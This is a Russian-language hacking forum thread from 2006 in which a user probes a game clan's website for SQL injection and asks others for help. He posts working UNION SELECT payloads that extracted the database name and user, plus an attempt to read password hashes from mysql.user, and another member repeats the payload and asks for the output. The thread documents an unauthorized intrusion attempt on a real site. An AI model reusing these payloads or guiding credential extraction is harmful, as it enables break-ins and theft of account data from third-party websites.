дЫРА ли это?

Discussion in 'Болталка' started by temon, 3 Jun 2006.

  1. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    пРИВЕТ всем.
    Тут на сайте одного из кланов БК нашел вот что.
    Если сделать запрос на статью:
    newsid='
    то вылазит:
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72

    sql-injection можно провести с помошью этого?
     
    #1 temon, 3 Jun 2006
    Last edited: 3 Jun 2006
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
  3. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    спасибо. проверю
     
  4. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    ура!!!
    сделал запрос:
    -1+union+select+1,2,3,4,5/*
    прокатило все.
    а как дальше строить запрос. помогите пожалуйста.
    да вот вытянул название бд и юзера.
    но не получаетсяс помошью этого:
    -1+union+select+1,2,user,password,5+from+mysql.us er/*
    вытянусть пасс
     
    #4 temon, 3 Jun 2006
    Last edited: 3 Jun 2006
  5. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    мне кто нить поможет в конце концов?
     
  6. K[o]S

    K[o]S Member

    Joined:
    29 Jul 2005
    Messages:
    17
    Likes Received:
    5
    Reputations:
    4
    Нет прав на доступ к базе mysql .
     
  7. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    #7 Utochka, 4 Jun 2006
    Last edited: 4 Jun 2006
    1 person likes this.
  8. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    -1+union+select+1,2,user,password,5+from+mysql.user/*
    Пропиши и дай лог что выдала страница.
     
  9. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    ничего не выдала.
    точнее то что и при простом ошибочном запросе.
    даже столбцов нету
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72